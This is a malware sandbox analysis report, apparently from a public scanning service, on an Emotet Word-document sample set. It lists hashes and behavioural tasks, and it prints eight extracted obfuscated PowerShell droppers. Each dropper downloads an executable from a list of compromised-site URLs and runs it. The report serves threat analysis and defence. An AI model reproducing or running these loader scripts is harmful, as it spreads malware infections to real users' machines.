2001:978:3c04:1::12  Public Scan

URL: https://tria.ge/200902-yxj792mp5x
Submission: On June 09 via api from RU — Scanned from NL









GENERAL

 * Target
   
   emotet-doc-20200901.zip
   
   

 * Size
   
   804KB
   
   

 * Sample
   
   200902-yxj792mp5x
   
   

 * MD5
   
   c8f70ccb8cfd4a42f9c076f1e9ce45ed
   
   

 * SHA1
   
   f4b62323bbae8ee34738c8596d10ea9d03be33b2
   
   

 * SHA256
   
   11226065bf8f906fd61d872022937b62bdd250b342a9a8a303a4dd4e522d99d0
   
   

 * SHA512
   
   908d57a82bb8bb865b73ed9280c2be8140e379ae593a9796ed10ad591f7d9fa5e34d6d8ed00d501253a54d1a67b69de77246c19b49195a4b2e30054b8b1a86d3
   
   

Score
10/10

macro

Static task

static1

macro

Behavioral task

behavioral1

Sample

E1-20200901_051300.doc

Resource

win10v200722


windows10_x64
0 signatures
0 seconds

Behavioral task

behavioral2

Sample

E1-20200901_102700.doc

Resource

win10v200722


windows10_x64
0 signatures
0 seconds

Behavioral task

behavioral3

Sample

E1-20200901_153500.doc

Resource

win10


windows10_x64
0 signatures
0 seconds

Behavioral task

behavioral4

Sample

E1-20200901_180500.doc

Resource

win10v200722


windows10_x64
0 signatures
0 seconds

Behavioral task

behavioral5

Sample

E1-20200901_212900.doc

Resource

win10v200722


windows10_x64
0 signatures
0 seconds

Behavioral task

behavioral6

Sample

E3-20200901_063500.doc

Resource

win10v200722


windows10_x64
0 signatures
0 seconds

Behavioral task

behavioral7

Sample

E3-20200901_110400.doc

Resource

win10


windows10_x64
0 signatures
0 seconds

Behavioral task

behavioral8

Sample

E3-20200901_160000.doc

Resource

win10v200722


windows10_x64
0 signatures
0 seconds

Behavioral task

behavioral9

Sample

E3-20200901_210000.doc

Resource

win10v200722


windows10_x64
0 signatures
0 seconds

MALWARE CONFIG

EXTRACTED

Language
ps1
Source
1
$Yxxnif0=('C'+('6'+'dmbf')+'8');&('n'+'ew-ite'+'m')
$env:usERPROfIlE\yeDzbq5\PF2qP2U\ -itemtype
diREcTORy;[Net.ServicePointManager]::"S`eCUrITy`PRO`T`OcoL" =
('t'+'ls'+('1'+'2'+', tls11, tl')+'s');$Svykjur =
('J'+('3'+'sa')+'t'+('8n'+'xa'));$Nae5s_a=('I'+('x8'+'d5')+'4f');$C5jef6k=$env:userprofile+(('Z'+('K'+'vYe'+'dzb')+('q5ZKvP'+'f'+'2')+('qp2u'+'Z')+'Kv')."RE`PLA`CE"(('ZK'+'v'),[STrinG][cHAR]92))+$Svykjur+('.'+('e'+'xe'));$Phnr8qj=('C'+('yiurb'+'j'));$Pub1hrj=&('new-'+'o'+'bjec'+'t')
NEt.weBCLIeNt;$On4491p=(('ht'+'tp')+(':/'+'/v')+'i'+('driod'+'ec'+'or')+'a'+('c'+'io')+('n'+'.c')+'o'+'m/'+('wp-ad'+'m')+('in/M'+'I')+'H/'+'*'+('htt'+'p:/')+'/v'+('a'+'nb')+('ras'+'t')+('.co'+'m')+'/'+'b'+'l'+'e'+('ech/fR'+'/')+'*'+('http'+':')+('/'+'/v'+'arivo'+'da.')+'co'+'m'+'/'+('cg'+'i')+('-'+'b'+'in/89')+'7/'+('*'+'ht')+('tp'+'://'+'w')+('ak'+'an')+('-t'+'ank')+('a.'+'org/')+('Kl'+'ei')+('nt'+'e'+'ile/E'+'/*http')+('s://w'+'ww.webho'+'st4'+'c'+'h'+'rist'+'.')+'o'+'rg'+('/'+'LA')+'M'+'B/'+('D/*'+'ht')+('t'+'p://wh')+('i'+'te-o')+('n-r'+'ic'+'e.')+'c'+('o'+'m/')+'L'+'o'+('g'+'os/'+'U/')+'*h'+('tt'+'p')+('://zah'+'n'+'a'+'rzt')+('-f'+'le')+'n'+('sb'+'u')+'r'+('g'+'.com')+'/'+('cg'+'i-b'+'in/')+('L'+'8/'))."sPL`it"([char]42);$J8w0ujm=('I'+('n'+'5jd')+'j0');foreach($N55qexv
in $On4491p){try{$Pub1hrj."dOWNL`oaDFI`LE"($N55qexv,
$C5jef6k);$Wdlgkup=(('Tm'+'2')+'6'+('2'+'qh'));If ((&('Get'+'-I'+'tem')
$C5jef6k)."lE`Ng`Th" -ge 25285)
{.('Invok'+'e-Ite'+'m')($C5jef6k);$W29hg6n=(('Getw'+'_')+'y6');break;$Nzn2d24=('N'+('his'+'r')+'n7')}}catch{}}$O8hsaty=('Y'+'m'+('bp8r'+'3'))
URLs
exe.dropper

http://vidriodecoracion.com/wp-admin/MIH/


exe.dropper

http://vanbrast.com/bleech/fR/


exe.dropper

http://varivoda.com/cgi-bin/897/


exe.dropper

http://wakan-tanka.org/Kleinteile/E/


exe.dropper

https://www.webhost4christ.org/LAMB/D/


exe.dropper

http://white-on-rice.com/Logos/U/


exe.dropper

http://zahnarzt-flensburg.com/cgi-bin/L8/



EXTRACTED

Language
ps1
Source
1
$Jffm_tv=('W5'+('gq'+'w')+'jg');.('n'+'ew-i'+'tem')
$Env:uSERPrOfIlE\hb8cvHk\vg5uB1d\ -itemtype
DirEcTOry;[Net.ServicePointManager]::"se`c`URi`TYPROtOcOL" = (('tls'+'12')+(',
t'+'l')+('s11'+', ')+('tl'+'s'));$Pc2nmr3 =
(('V'+'40')+'6'+('8'+'9hmw'));$Sdii770=('A'+('g'+'mpk')+'3q');$N73tjc4=$env:userprofile+(('{'+'0}'+('H'+'b8')+('cv'+'hk')+'{0}'+'Vg5ub1d{0}')
-f
[chAR]92)+$Pc2nmr3+(('.e'+'x')+'e');$F2a69u_=('S'+('i3'+'i')+('d'+'p9'));$Un9yi2c=.('ne'+'w-ob'+'ject')
NET.weBclIenT;$Rx24snx=(('h'+'tt')+('p:'+'/')+('/tine'+'r')+('se'+'rv'+'is.c'+'om/'+'cgi')+'-b'+('i'+'n/')+('fqo'+'/*')+('h'+'tt'+'p://')+('w'+'ww.t')+('e'+'lec'+'onx')+('.c'+'om/c')+('gi'+'-b')+('in/Sv'+'t'+'/*h'+'ttp://t')+('hecom'+'ed'+'ycro'+'w'+'d')+('.c'+'om/')+'p'+'u'+'n'+'ka'+'n'+'ar'+('y/O5/'+'*'+'h')+('t'+'tp')+':/'+('/'+'tob')+'y'+('-warren'+'.')+('co'+'m')+'/'+('cgi-'+'b')+('i'+'n/2')+('ja/*http'+'s'+':'+'//ww')+('w.ti'+'er'+'rasi')+('ns'+'o'+'litas.c')+('om/p'+'rueba/'+'e/*'+'h')+'tt'+('p:'+'/')+'/u'+'h'+('le'+'n')+'bu'+('sch.'+'inf')+('o/'+'W')+('or'+'d')+('P'+'re'+'ss_'+'03/QE/')+('*http:/'+'/va'+'n')+('ba'+'al')+('en'+'.info/'+'cg')+('i-b'+'in/K'+'F4/'))."Sp`LIt"([char]42);$T24snx0=('M'+('6i'+'_')+('rp'+'t'));foreach($Iwcj84a
in $Rx24snx){try{$Un9yi2c."do`wnlOad`FILe"($Iwcj84a,
$N73tjc4);$Kw1rm2l=('C'+('is'+'xe'+'2y'));If ((.('Ge'+'t-'+'Item')
$N73tjc4)."LeN`gTH" -ge 31799)
{&('Invok'+'e-I'+'tem')($N73tjc4);$Ozt090v=('So'+('cl_t'+'k'));break;$O5s1rr_=(('Q'+'pe'+'elg')+'2')}}catch{}}$Q292_jr=(('D'+'zwni')+'6d')
URLs
exe.dropper

http://tinerservis.com/cgi-bin/fqo/


exe.dropper

http://www.teleconx.com/cgi-bin/Svt/


exe.dropper

http://thecomedycrowd.com/punkanary/O5/


exe.dropper

http://toby-warren.com/cgi-bin/2ja/


exe.dropper

https://www.tierrasinsolitas.com/prueba/e/


exe.dropper

http://uhlenbusch.info/WordPress_03/QE/


exe.dropper

http://vanbaalen.info/cgi-bin/KF4/



EXTRACTED

Language
ps1
Source
1
$Bwjhppc=('Of'+('u8x9'+'z'));.('new-i'+'t'+'em')
$ENv:USerPRofiLe\Yt_y5jN\nKmZfVz\ -itemtype
dIRECtOrY;[Net.ServicePointManager]::"SecUR`i`TYP`RotOc`ol" = (('tls'+'1')+('2,
'+'t')+('ls1'+'1,')+(' t'+'ls'));$Vneuir0 =
(('Sp'+'3k7')+('gu'+'s'));$Bz3darj=('G'+('r'+'wi'+'3_t'));$Txaibqz=$env:userprofile+(('t'+('r'+'hYt'+'_y')+('5j'+'n')+('t'+'rhNk'+'mz')+('fv'+'zt')+'rh')
-rePlAcE
([cHar]116+[cHar]114+[cHar]104),[cHar]92)+$Vneuir0+('.'+('ex'+'e'));$Bez1rmw=('T_'+('1'+'4o_')+'7');$S8_a5qy=&('new-obj'+'ec'+'t')
nET.wEbCLIENt;$Jj2ok2r=('h'+'t'+('t'+'p:/')+('/sind'+'i'+'ca')+('t'+'o'+'desegu')+('rida'+'d')+('.co'+'m')+('/_bo'+'rd'+'ers')+('/'+'lXe/*http'+':')+'//'+('s'+'eattl')+('eb'+'ug')+('safar'+'i'+'.c')+('om'+'/Im')+'a'+('ges'+'/')+('5JM/*h'+'t'+'tp:/'+'/')+('s'+'pa')+'nf'+('erke'+'l')+('g'+'ril'+'l-ve'+'r'+'leih.')+('c'+'om')+('/'+'cg')+('i-b'+'i'+'n/Yk/'+'*'+'http:')+'//'+('sn'+'oeke')+('r.'+'com/')+'cg'+('i-'+'bi')+('n/A'+'Z7')+('/*h'+'ttp')+(':/'+'/')+('s'+'ta')+('nd'+'on')+('theedge.'+'c'+'o'+'m')+('/cgi-'+'b'+'in')+('/'+'C/')+('*ht'+'t'+'p://tjde')+('n'+'gle')+('r.'+'in')+('fo/c'+'gi-'+'bin/')+('r'+'/*')+('ht'+'t')+('ps://s'+'e'+'d')+('al'+'aser.c'+'o')+('m/ima'+'g'+'e')+('s/n'+'iq'+'/'))."S`plIT"([char]42);$T9o1l5t=('H'+('inq'+'dm9'));foreach($By61576
in $Jj2ok2r){try{$S8_a5qy."dO`wnLo`AdfI`LE"($By61576,
$Txaibqz);$G44c634=(('C'+'gm')+'b2'+'rl');If ((&('Get-'+'I'+'tem')
$Txaibqz)."len`gtH" -ge 25762)
{.('Invo'+'ke-'+'It'+'em')($Txaibqz);$Or5w4gi=(('Aqi_'+'g')+'sp');break;$Huvg4i_=(('Sx'+'es')+'s8'+'5')}}catch{}}$B6u7e5q=(('Os5'+'m')+('uz'+'8'))
URLs
exe.dropper

http://sindicatodeseguridad.com/_borders/lXe/


exe.dropper

http://seattlebugsafari.com/Images/5JM/


exe.dropper

http://spanferkelgrill-verleih.com/cgi-bin/Yk/


exe.dropper

http://snoeker.com/cgi-bin/AZ7/


exe.dropper

http://standontheedge.com/cgi-bin/C/


exe.dropper

http://tjdengler.info/cgi-bin/r/


exe.dropper

https://sedalaser.com/images/niq/



EXTRACTED

Language
ps1
Source
1
$Nyrhfxe=('Nw'+('ltfk'+'1'));&('new'+'-'+'item')
$Env:USErPROfILe\nqT9Lxd\sg4dzEy\ -itemtype
diReCTOry;[Net.ServicePointManager]::"SEcurI`TYp`RO`To`COL" = ('tl'+'s'+('12'+',
tl')+('s11, '+'tls'));$Dkwnn1q =
('H'+('xv'+'b09a'));$L8lss46=('Q'+('_6'+'zji')+'s');$Athazl8=$env:userprofile+((('NFM'+'Nq')+'t'+('9lx'+'d')+('NFMS'+'g4d'+'zey')+'N'+'FM')
-CReplAcE
('NF'+'M'),[ChAR]92)+$Dkwnn1q+('.'+('e'+'xe'));$Iyp1mvf=(('Ms5'+'buw')+'y');$Dnas2my=&('ne'+'w-o'+'bject')
neT.WEBcLIeNt;$Fpfp42x=(('h'+'tt')+'p'+(':'+'//')+('pt'+'w')+'m'+'u'+('s'+'ic.')+('com/'+'t')+'hu'+'m'+('bs'+'/TN/*')+('h'+'ttp:'+'/')+('/'+'re')+'f'+'in'+'a'+'n'+('z'+'.or')+('g/b'+'a')+('che'+'l')+('or'+'me_'+'d'+'e/I/')+('*h'+'t')+'t'+('ps://prpr'+'ofil'+'e')+('.'+'com')+('/wp-a'+'d'+'min/B2')+('/*ht'+'t')+'p'+'s:'+('/'+'/rad'+'iom')+('uz'+'i')+('ek'+'land')+('.c'+'om/cont')+'a'+'c'+'t/'+('f'+'/*')+('h'+'ttps'+':')+'/'+'/'+('rbji'+'.')+'c'+('om/'+'rbj')+('fi'+'le')+'s'+('/5/'+'*'+'ht')+('t'+'p:')+('/'+'/r')+'el'+'i'+('ca'+'tess'+'en.co'+'m'+'/index'+'_h'+'tm')+'_'+('fi'+'les/')+'9/'+'*h'+('ttps:'+'/')+('/w'+'ww')+'.p'+('ho'+'enix')+('-i'+'n'+'ter')+('n'+'et.')+'co'+'m/'+'i'+('nco'+'n')+'t'+('e'+'xt')+'/Q'+('JN'+'/'))."SPl`It"([char]42);$Qc3imxn=('T'+'l'+('8fq'+'ab'));foreach($A1jdrs6
in $Fpfp42x){try{$Dnas2my."D`OWnLO`Adf`Ile"($A1jdrs6,
$Athazl8);$Dz2ltlc=('T'+('8a'+'_04')+'p');If ((.('Get-I'+'t'+'em')
$Athazl8)."LeN`G`TH" -ge 20308)
{.('Invo'+'k'+'e-It'+'em')($Athazl8);$Gbhrjuz=('S0'+'a'+('y_'+'_q'));break;$U877mcm=('Xq'+('p'+'wn2')+'0')}}catch{}}$X6g_6v7=('A'+('b'+'4nch')+'3')
URLs
exe.dropper

http://ptwmusic.com/thumbs/TN/


exe.dropper

http://refinanz.org/bachelorme_de/I/


exe.dropper

https://prprofile.com/wp-admin/B2/


exe.dropper

https://radiomuziekland.com/contact/f/


exe.dropper

https://rbji.com/rbjfiles/5/


exe.dropper

http://relicatessen.com/index_htm_files/9/


exe.dropper

https://www.phoenix-internet.com/incontext/QJN/



EXTRACTED

Language
ps1
Source
1
$Exrh_yv=(('Z'+'5bxs')+'0r');.('new-i'+'tem') $ENv:userprofIlE\cs722E8\u87fwa6\
-itemtype DirEcTOry;[Net.ServicePointManager]::"seCur`I`Ty`Prot`oCol" =
('t'+('ls1'+'2,')+(' tls'+'1')+'1'+(','+' tls'));$Pnt724r =
(('Pp7'+'rc')+'m');$Nsa77qo=('Ps'+('5zdl'+'k'));$Qofy4mu=$env:userprofile+((('jNrC'+'s')+('722'+'e')+('8jNr'+'U')+'8'+('7fwa6jN'+'r'))."r`Eplace"(([char]106+[char]78+[char]114),'\'))+$Pnt724r+(('.'+'ex')+'e');$L9z38dj=(('W'+'q2ug')+'eo');$Qkzdwel=&('new-'+'o'+'bject')
Net.wEBClIent;$Ntpx_a5=(('ht'+'tp:/')+('/nn'+'p')+('stv.c'+'o')+('m/'+'ne')+'w'+('sl'+'ett')+'e'+('r'+'/'+'hDT/')+'*h'+'t'+'t'+('p:'+'//o')+'n'+('ei'+'n')+'si'+'x.'+'c'+'o'+('m/pl'+'e'+'sk'+'-sta'+'t/S')+'7'+('6/'+'*')+('ht'+'t')+('p:'+'/')+('/vi'+'l')+'la'+'te'+'r'+('a.c'+'om')+('/'+'cgi-')+'b'+'i'+('n/'+'CHy/*')+'ht'+('t'+'p:/')+('/party'+'-'+'p')+'i'+'x'+'.o'+'rg'+'/'+'c'+('g'+'i-b')+('i'+'n/G')+'V'+('p'+'/*htt')+('p'+':/')+('/s'+'ab')+'i'+'n'+'e'+('schulte.'+'n'+'e')+('t/'+'cg')+('i'+'-bin')+('/x/*h'+'t')+('t'+'p://')+('p'+'autz.o'+'rg/c'+'gi')+('-'+'bi')+('n/uB6/'+'*htt'+'p:/'+'/n')+'o'+('bi'+'u')+('s'+'.o')+('r'+'g/hutc')+'hi'+'n'+'s/'+'w/')."sPL`iT"([char]42);$Vm_1_31=('P'+('5'+'q'+'fyjn'));foreach($Ydr__0d
in $Ntpx_a5){try{$Qkzdwel."d`OwnL`oad`FilE"($Ydr__0d,
$Qofy4mu);$Impunvo=('F'+('oap'+'1')+'65');If ((&('Ge'+'t-Item')
$Qofy4mu)."le`NGTH" -ge 29363)
{.('Invoke'+'-I'+'tem')($Qofy4mu);$F63mudy=(('Z'+'gd')+'ye'+'0v');break;$Xh615ij=('O'+('sw3'+'ka')+'2')}}catch{}}$Zbqpwr3=('T'+'m'+('pp'+'l3d'))
URLs
exe.dropper

http://nnpstv.com/newsletter/hDT/


exe.dropper

http://oneinsix.com/plesk-stat/S76/


exe.dropper

http://villatera.com/cgi-bin/CHy/


exe.dropper

http://party-pix.org/cgi-bin/GVp/


exe.dropper

http://sabineschulte.net/cgi-bin/x/


exe.dropper

http://pautz.org/cgi-bin/uB6/


exe.dropper

http://nobius.org/hutchins/w/



EXTRACTED

Language
ps1
Source
1
$Vcryy7p=('Wu'+('q'+'75')+'li');.('new-it'+'e'+'m')
$enV:USErProfilE\joX49_e\XA1UGAz\ -itemtype
diREcTORY;[Net.ServicePointManager]::"sEC`UR`I`Typr`OtocOL" = ('tl'+'s1'+('2'+',
')+('tl'+'s'+'11,')+(' tl'+'s'));$Nqnpr0h =
('S'+('ux'+'k')+('gk'+'93'));$Xsc0s5t=('Z'+'wo'+('su'+'gr'));$Th7pdyc=$env:userprofile+((('vS'+'V')+('Jox'+'4')+('9_ev'+'SV'+'X'+'a1')+('u'+'ga')+('zvS'+'V'))."r`eplA`Ce"(([CHAR]118+[CHAR]83+[CHAR]86),'\'))+$Nqnpr0h+('.'+('ex'+'e'));$I0nuifv=('F'+('7wn'+'o')+'ht');$E89i7ul=&('new'+'-'+'object')
net.WebCliENt;$Z8u_lg2=(('ht'+'tp')+(':/'+'/t-'+'pr')+'i'+('va'+'t.')+'de'+'/c'+('gi'+'-b')+('in'+'/')+('FQ'+'zG'+'OWY/*h')+('t'+'tp://'+'z'+'oom')+('an'+'ds')+('h'+'oo'+'tph')+('o'+'togra')+('phy'+'.com'+'/wp-')+'i'+('n'+'cl')+('ude'+'s')+('/'+'fil')+('e'+'/WZyz'+'a')+'lV'+('lzJ'+'W')+'c/'+('*ht'+'t')+'p:'+('//ou'+'tof')+('ph'+'as')+('e'+'.d'+'e/U')+('pl'+'oads/')+('J'+'1'+'tov12'+'7666')+('8/'+'*h'+'tt'+'ps://odevill'+'e'+'.')+('de/cgi'+'-bin'+'/f'+'ile/OqS'+'D/')+'*h'+('ttp:'+'//to')+('msst'+'e'+'akho')+('us'+'e.c')+('om/'+'wp-')+('i'+'nclu')+'d'+('es'+'/L')+('bZjD/*'+'h')+'t'+('tp'+':'+'//th')+'e'+'c'+('re'+'ativ')+'er'+('oni'+'n.'+'com')+'/w'+('p'+'/f')+'il'+('e/u'+'zXiZSaTC'+'Sa'+'/*http:')+'//'+('o'+'li')+('ver'+'kre')+('mer.n'+'et')+('/c'+'gi'+'-b')+('in'+'/file')+'/'+('mZ'+'p'+'Cq/'))."Spl`iT"([char]42);$Sv2onnn=(('Ye5'+'1')+('6a'+'f'));foreach($M8p_z4d
in $Z8u_lg2){try{$E89i7ul."Dow`NLoAdFi`lE"($M8p_z4d,
$Th7pdyc);$El7mui7=('Y'+'k2'+('xi'+'fn'));If ((&('G'+'et-Item')
$Th7pdyc)."Le`NgTh" -ge 35972)
{.('In'+'voke'+'-'+'Item')($Th7pdyc);$G40qcw9=(('Qw'+'d')+('m6'+'9')+'h');break;$Ghdmgvr=(('Z'+'qdx1')+'s3')}}catch{}}$Aywhg9d=(('Y28'+'w3p')+'c')
URLs
exe.dropper

http://t-privat.de/cgi-bin/FQzGOWY/


exe.dropper

http://zoomandshootphotography.com/wp-includes/file/WZyzalVlzJWc/


exe.dropper

http://outofphase.de/Uploads/J1tov1276668/


exe.dropper

https://odeville.de/cgi-bin/file/OqSD/


exe.dropper

http://tomssteakhouse.com/wp-includes/LbZjD/


exe.dropper

http://thecreativeronin.com/wp/file/uzXiZSaTCSa/


exe.dropper

http://oliverkremer.net/cgi-bin/file/mZpCq/



EXTRACTED

Language
ps1
Source
1
$Me_mvyt=(('G'+'y8_')+('c6'+'s'));&('new-'+'it'+'em')
$eNv:uSerPrOfIle\ElXMqAf\vo4X6l2\ -itemtype
DirEctoRY;[Net.ServicePointManager]::"SE`CuRIty`P`R`OtOcOl" = (('t'+'ls12,'+'
t')+'ls'+'11'+', '+'t'+'ls');$Owd7uql =
(('Mb'+'t8k')+'3d'+'l');$Yxqrsmj=(('Uo'+'pr')+('_c'+'t'));$I5bq6je=$env:userprofile+(('K'+('r'+'LEl')+'xm'+('qaf'+'KrLV'+'o4x6l')+'2'+'K'+'r'+'L')-crEplACE
('Kr'+'L'),[chaR]92)+$Owd7uql+(('.e'+'x')+'e');$Td4dga_=(('Cf'+'54')+'6a'+'1');$Fvzkgwd=&('n'+'e'+'w-o'+'bject')
nEt.wEBcliENT;$Dn5svf1=('ht'+'tp'+(':/'+'/st')+'a'+'l'+'l'+'-'+'ro'+('senb'+'u')+('sc'+'h')+('.'+'com/_')+'/'+('yn'+'WT/')+('*ht'+'tp:')+('//steu'+'e')+'r'+('bu'+'e')+('ro'+'-n')+('ac'+'k.d')+('e/Gr'+'un')+'d'+'s'+('ei'+'t')+'e'+('/2HCi5'+'5')+('se'+'6')+'1'+'/*'+'h'+('ttp'+':/')+('/st'+'oep')+'fe'+'r.'+('de'+'/cg'+'i-bin')+'/Z'+('pQC'+'mA')+('kDJ'+'f')+('Wm'+'Y')+('/*ht'+'t')+('p:'+'/')+'/s'+('uma'+'-k')+('e'+'mper')+'.d'+'e/'+('AH'+'_Ho')+'rn'+'/'+('I'+'m'+'537a'+'14725')+('8'+'755')+'/'+'*h'+('tt'+'p')+':/'+('/sun'+'sh'+'ine'+'st')+('ate-'+'fl'+'o')+'ri'+'d'+'a.'+('c'+'om/')+'c'+('gi-'+'b')+'i'+('n'+'/ZgSKUg')+('s/'+'*htt'+'ps:')+('//su'+'n')+'d'+'e'+'-c'+('om'+'p')+('ut'+'er')+('.'+'de')+('/Wor'+'dP'+'r')+('e'+'ss_0')+('1/9'+'l')+('YAw'+'h')+'r'+('0'+'u1i'+'3c39'+'983')+'8'+('1/'+'*')+'h'+'t'+'tp'+':/'+'/t'+('ag'+'am')+('oga'+'.d')+('e/G'+'C/k'+'fa4o')+('59g'+'1')+'11'+('19'+'8/'))."sPL`IT"([char]42);$Ryxado2=(('R'+'ek')+('q'+'dis'));foreach($E4zzh8d
in $Dn5svf1){try{$Fvzkgwd."DOwN`lo`ADFi`le"($E4zzh8d,
$I5bq6je);$Aetzlhs=(('Qu'+'o')+('nsq'+'_'));If ((.('Get-'+'Ite'+'m')
$I5bq6je)."LE`NGth" -ge 34999)
{.('Inv'+'oke'+'-Ite'+'m')($I5bq6je);$K4mqszn=(('M'+'pb2')+'t'+'46');break;$W42sb1r=(('S'+'nta')+('o'+'5h'))}}catch{}}$O31qgss=('D'+('l5'+'3')+('rh'+'e'))
URLs
exe.dropper

http://stall-rosenbusch.com/_/ynWT/


exe.dropper

http://steuerbuero-nack.de/Grundseite/2HCi55se61/


exe.dropper

http://stoepfer.de/cgi-bin/ZpQCmAkDJfWmY/


exe.dropper

http://suma-kemper.de/AH_Horn/Im537a147258755/


exe.dropper

http://sunshinestate-florida.com/cgi-bin/ZgSKUgs/


exe.dropper

https://sunde-computer.de/WordPress_01/9lYAwhr0u1i3c3998381/


exe.dropper

http://tagamoga.de/GC/kfa4o59g111198/



EXTRACTED

Language
ps1
Source
1
$Yt7gbpu=(('Ss'+'x')+'_o'+'b_');.('ne'+'w-item')
$enV:useRPrOFiLE\BAK4b5n\U9nE3Hk\ -itemtype
DIReCtOrY;[Net.ServicePointManager]::"SECuRI`TYPROtO`C`OL" = (('t'+'ls12')+','+'
'+('tls11'+', t')+'l'+'s');$Cfiwraw =
('S'+('dnm'+'1ys')+'gn');$Zhxa487=('R'+('9'+'ep')+('fx'+'r'));$A273fae=$env:userprofile+(('{0}Ba'+('k4'+'b')+'5n'+'{0}U9n'+'e3hk{0}')
-F
[chaR]92)+$Cfiwraw+('.'+('ex'+'e'));$Bthnn30=('Ky'+('60'+'wja'));$Ioc798g=&('new-o'+'bje'+'ct')
net.WeBclIeNt;$B5c2fwx=('h'+('tt'+'p://sc'+'hic'+'kle.o'+'rg/c'+'gi')+'-'+('bin/'+'f')+'i'+('le/WkNEqj'+'yv'+'m')+'gM'+'/*'+('ht'+'tp:')+'//'+'x'+('xf'+'res')+('hxx'+'.d')+'e'+'/b'+('ike'+'/')+('f'+'ile/mR')+'B/'+'*'+'h'+('ttp'+':')+('//'+'west')+('e'+'rnd')+('ata'+'.c')+('o'+'m.au/w'+'p-'+'inc')+('lu'+'d')+('es/'+'V'+'Tgoqi')+('i6r4'+'1'+'1691/*h'+'t'+'t')+('p://'+'weiers'+'tr'+'ass.')+'de'+('/'+'Elch/'+'f'+'ile/X')+'Qr'+'H/'+('*h'+'ttp')+('://w'+'e'+'s')+('te'+'nd-zoo.de'+'/Ba')+('v'+'ari')+'a'+'/'+('n9HCzf27r6'+'w'+'j'+'697'+'7/*h'+'ttp:')+('//w'+'a')+('silewsk'+'i-o'+'nl'+'ine'+'.de/'+'bild'+'er/aqw'+'t'+'i')+('rl'+'955')+('496'+'12')+('/*htt'+'p'+'://'+'wetzi'+'.d')+('e/c'+'gi'+'-b')+('i'+'n/fi')+('le/he'+'LeDq'+'ESy'+'V/'))."s`PLIT"([char]42);$U9qmo1z=('Cr'+'m'+('b1'+'j9'));foreach($Vlkpm_q
in $B5c2fwx){try{$Ioc798g."do`wnLoAdF`i`lE"($Vlkpm_q,
$A273fae);$Wrv0_a1=('G'+'d'+('v'+'fb9l'));If ((&('Get'+'-Ite'+'m')
$A273fae)."L`eNGth" -ge 28361)
{.('Invoke'+'-'+'Ite'+'m')($A273fae);$Kxhge6n=('Lj'+'7'+('p9'+'5f'));break;$Ddeyb24=(('G'+'ek')+('euz'+'g'))}}catch{}}$Ydkx2t1=('Fe'+('t2'+'54l'))
URLs
exe.dropper

http://schickle.org/cgi-bin/file/WkNEqjyvmgM/


exe.dropper

http://xxfreshxx.de/bike/file/mRB/


exe.dropper

http://westerndata.com.au/wp-includes/VTgoqii6r411691/


exe.dropper

http://weierstrass.de/Elch/file/XQrH/


exe.dropper

http://westend-zoo.de/Bavaria/n9HCzf27r6wj6977/


exe.dropper

http://wasilewski-online.de/bilder/aqwtirl95549612/


exe.dropper

http://wetzi.de/cgi-bin/file/heLeDqESyV/



EXTRACTED

Language
ps1
Source
1
$Epj589i=(('Xf0'+'h')+('r3'+'l'));.('new-'+'item')
$eNv:UseRpRofilE\PS29B6C\LSq3B_L\ -itemtype
dIREcToRy;[Net.ServicePointManager]::"SeCUrI`TyPR`Ot`Oc`oL" = (('tls'+'12,')+'
'+'t'+('ls'+'11')+', '+('t'+'ls'));$H_8jt5c =
(('Z'+'vh')+('5'+'ea')+'nv');$R_zsv1k=(('Bc'+'dui')+'8'+'y');$Lnxph9m=$env:userprofile+(('5T'+('z'+'P'+'s29b6c')+'5'+('Tz'+'Ls')+('q3'+'b'+'_l5Tz'))
-CREPLACe('5T'+'z'),[cHAR]92)+$H_8jt5c+('.'+('e'+'xe'));$Lb786ry=(('V3'+'q4')+('s2'+'g'));$Se5zhtm=&('new'+'-obj'+'ect')
NEt.wEBcLieNt;$Fi8igob=('h'+'tt'+'p'+':/'+('/r'+'ue')+'ck'+'er'+('t-'+'o')+('nlin'+'e'+'.d')+('e/'+'cgi')+'-b'+('in'+'/')+'K'+('r'+'h7nr'+'1978'+'/*')+'h'+'tt'+'p'+('s:'+'/')+'/'+('rub'+'enw')+('in'+'kelm')+('an.'+'n'+'l/c')+'gi'+'-'+'bi'+('n/'+'lU')+('H'+'/*ht')+'t'+('p:'+'/')+('/'+'ruper')+'t'+('st'+'re')+('et.d'+'e')+'/'+'H'+('eidi'+'s-')+'E'+('x'+'/atta'+'ch/v')+'C'+'FS'+('ak'+'PHq/*')+'h'+('ttp://'+'sa')+'m'+('atec'+'h')+('nic'+'s')+'.c'+('om'+'/_'+'scri')+('p'+'ts/D')+('Wxip'+'w/'+'*h')+'t'+('t'+'p:')+'/'+('/'+'sc')+'ha'+('id'+'l')+('.d'+'e')+'/b'+('ild'+'er/')+'k'+'c1'+('rs4'+'7'+'46')+'57'+'/*'+('ht'+'tp:')+('/'+'/s')+('a'+'uerbeck.'+'n'+'et/cgi-')+'b'+'i'+'n'+'/M'+('W'+'ROisGUD'+'p'+'B/*ht'+'t')+'p'+('://'+'s')+('c'+'ha')+('e'+'fer')+('-f'+'ran'+'k.d')+('e/c'+'gi-bin'+'/c')+'b'+('j'+'5r')+'n'+('qm65'+'z'+'m83')+'1'+'2/')."S`pLit"([char]42);$Ruh0t4l=(('Rt'+'p')+('1hb'+'3'));foreach($Kco4l69
in $Fi8igob){try{$Se5zhtm."DoW`NLOa`Df`ilE"($Kco4l69,
$Lnxph9m);$Ovy0rzp=('Is'+('y'+'4ksg'));If ((.('Get-'+'Ite'+'m')
$Lnxph9m)."Leng`TH" -ge 25786)
{&('Invo'+'ke-I'+'tem')($Lnxph9m);$A7zzz1y=('L'+('i'+'mb0_4'));break;$Ui8diw_=(('Axbe'+'sf')+'g')}}catch{}}$D5ggc_7=('Ah'+('a'+'qd')+'gn')
URLs
exe.dropper

http://rueckert-online.de/cgi-bin/Krh7nr1978/


exe.dropper

https://rubenwinkelman.nl/cgi-bin/lUH/


exe.dropper

http://rupertstreet.de/Heidis-Ex/attach/vCFSakPHq/


exe.dropper

http://samatechnics.com/_scripts/DWxipw/


exe.dropper

http://schaidl.de/bilder/kc1rs474657/


exe.dropper

http://sauerbeck.net/cgi-bin/MWROisGUDpB/


exe.dropper

http://schaefer-frank.de/cgi-bin/cbj5rnqm65zm8312/



TARGETS

 *  * Target
      
      E1-20200901_051300
      
      
   
    * Size
      
      167KB
      
      
   
    * MD5
      
      addf8b33335d70314cf18f5582ee4a12
      
      
   
    * SHA1
      
      f2e64096c370fabe69931cee4dbd1532ebd193b5
      
      
   
    * SHA256
      
